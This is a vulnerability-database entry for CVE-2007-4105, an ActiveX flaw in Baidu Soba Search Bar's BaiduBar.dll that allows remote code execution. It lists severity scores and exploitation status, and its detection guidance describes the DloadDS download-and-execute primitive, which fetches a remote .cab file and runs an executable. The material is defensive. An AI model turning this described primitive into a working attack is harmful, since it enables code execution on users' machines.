CVE-2007-4105
published 2007-07-31CVE-2007-4105: A certain ActiveX control in BaiduBar.dll in Baidu Soba Search Bar 5.4 allows remote attackers to execute arbitrary code via a request containing "a link to…
PriorityP266critical9.3CVSS 2.0
AVNACMAuNCCICAC
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
7.32%
93.6th percentile
A certain ActiveX control in BaiduBar.dll in Baidu Soba Search Bar 5.4 allows remote attackers to execute arbitrary code via a request containing "a link to download and a file to execute," possibly involving remote file inclusion.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| baidu | soba_search_bar | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor ActiveX method calls to DloadDS on BaiduBar.dll, particularly those supplying a remote .cab URL and an executable filename as arguments — this is the exact exploit primitive used in CVE-2007-4105. ↗
- →Detect Internet Explorer loading BaiduBar.dll as an ActiveX control followed by outbound HTTP requests to download .cab files and subsequent process execution — indicative of the download-and-execute attack chain. ↗
- ·The exploit PoC uses a placeholder domain (www.example.com); real-world attacks will substitute an attacker-controlled URL. Detection rules should focus on the DloadDS method call pattern rather than any specific domain. ↗
- ·Other versions of Baidu Soba beyond 5.4 may also be affected; version-pinned detections targeting only 5.4 may miss vulnerable deployments. ↗
CVSS provenance
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-mrvp-cxc3-h9q7: A certain ActiveX control in BaiduBar
ghsa_unreviewed·2022-05-01
CVE-2007-4105 [HIGH] GHSA-mrvp-cxc3-h9q7: A certain ActiveX control in BaiduBar
A certain ActiveX control in BaiduBar.dll in Baidu Soba Search Bar 5.4 allows remote attackers to execute arbitrary code via a request containing "a link to download and a file to execute," possibly involving remote file inclusion.
VulnCheck
Baidu Soba Search Bar 'BaiduBar.dll' Vulnerability
vulncheck·2007·CVSS 9.3
CVE-2007-4105 [CRITICAL] Baidu Soba Search Bar 'BaiduBar.dll' Vulnerability
Baidu Soba Search Bar 'BaiduBar.dll' Vulnerability
A certain ActiveX control in BaiduBar.dll in Baidu Soba Search Bar 5.4 allows remote attackers to execute arbitrary code via a request containing "a link to download and a file to execute," possibly involving remote file inclusion.
Affected: baidu soba_search_bar
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://betanews.com/2008/05/19/ten-thousand-servers-hit-in-sql-injection-hack/
No detection rules found.
No writeups or analysis indexed.
http://secunia.com/advisories/26256http://www.fortiguardcenter.com/advisory/FGA-2007-10.htmlhttp://www.securityfocus.com/archive/1/475320/100/0/threadedhttp://www.securityfocus.com/bid/25121http://www.vupen.com/english/advisories/2007/2699https://exchange.xforce.ibmcloud.com/vulnerabilities/35692http://secunia.com/advisories/26256http://www.fortiguardcenter.com/advisory/FGA-2007-10.htmlhttp://www.securityfocus.com/archive/1/475320/100/0/threadedhttp://www.securityfocus.com/bid/25121http://www.vupen.com/english/advisories/2007/2699https://exchange.xforce.ibmcloud.com/vulnerabilities/35692
2007-07-31
Published
Exploited in the wild